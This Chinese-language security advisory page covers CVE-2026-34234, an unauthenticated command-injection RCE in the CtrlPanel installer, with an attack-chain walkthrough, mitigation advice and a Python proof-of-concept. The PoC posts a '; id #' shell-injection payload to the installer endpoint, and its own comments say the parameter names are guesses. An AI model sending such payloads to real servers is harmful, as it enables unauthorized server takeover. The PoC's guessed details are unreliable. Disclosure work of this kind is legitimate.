CVE-2026-34234 CVSS 10.0 严重

CVE-2026-34234 CtrlPanel 远程代码执行漏洞

披露日期: 2026-05-19

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-34234

漏洞类型

远程代码执行 (RCE)

CVSS评分

10.0 严重

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

CtrlPanel

漏洞概述

CtrlPanel 是一款开源托管计费软件。在 1.1.1 及更早版本中，其 Web 安装程序存在未经身份验证的远程代码执行 (RCE) 漏洞。由于 install.lock 锁文件检查在表单处理程序执行之后进行，导致已安装实例的安装端点仍可访问。攻击者可利用未经过滤的用户输入执行任意系统命令。目前该漏洞已被野外利用。

技术细节

漏洞源于安装程序逻辑设计缺陷与命令注入的结合。首先，`public/installer/index.php` 在执行 `include` 引入表单处理文件后才检查 `install.lock` 文件是否存在，导致已安装系统的安装接口未正确关闭。其次，表单处理程序直接将未经过滤的用户输入拼接到 shell 命令中执行。攻击者无需身份认证，只需向受影响端点发送特制的 HTTP 请求，注入恶意 Shell 命令，即可在服务器端以 Web 进程权限执行任意代码，完全控制服务器。

攻击链分析

STEP 1

1. 信息搜集

攻击者识别出目标正在使用 CtrlPanel 软件，且版本在 1.1.1 或更低。

STEP 2

2. 访问安装界面

攻击者直接访问 `public/installer/index.php` 接口，由于逻辑缺陷，该接口在系统已安装情况下仍可响应。

STEP 3

3. 注入恶意载荷

攻击者在 POST 请求参数中插入特制的 Shell 命令（如 `; whoami`），利用未过滤的输入点进行命令注入。

STEP 4

4. 执行命令

服务器端脚本将恶意参数拼接进系统命令并执行，攻击者获取服务器权限，实现 RCE。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

def exploit_rce(target_url):
    """
    PoC for CVE-2026-34234
    Exploits unauthenticated RCE in CtrlPanel installer.
    """
    # The vulnerable endpoint is the installer index
    url = f"{target_url}/public/installer/index.php"
    
    # The vulnerability allows injecting shell commands via user input.
    # Assuming a parameter like 'step' or 'dbhost' is passed to shell_exec().
    # Example payload: "; id # to execute the 'id' command.
    payload = "; id #"
    
    data = {
        # Parameter names are hypothetical based on common installers
        # as specific params were not listed in the text description.
        "step": "2",
        "dbhost": payload 
    }

    try:
        response = requests.post(url, data=data, timeout=10)
        if response.status_code == 200:
            print("[+] Request sent successfully.")
            print("[+] Check response for command execution output.")
            print(response.text)
        else:
            print(f"[-] Unexpected status code: {response.status_code}")
    except Exception as e:
        print(f"[-] Error: {e}")

if __name__ == "__main__":
    target = "http://example.com" # Replace with actual target
    exploit_rce(target)

影响范围

CtrlPanel <= 1.1.1

防御指南

临时缓解措施

如果无法立即升级，请务必从服务器上删除 `public/installer` 目录，或通过 Web 服务器配置（如 Nginx/Apache）规则禁止对该路径的外部访问请求，以封堵攻击路径。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表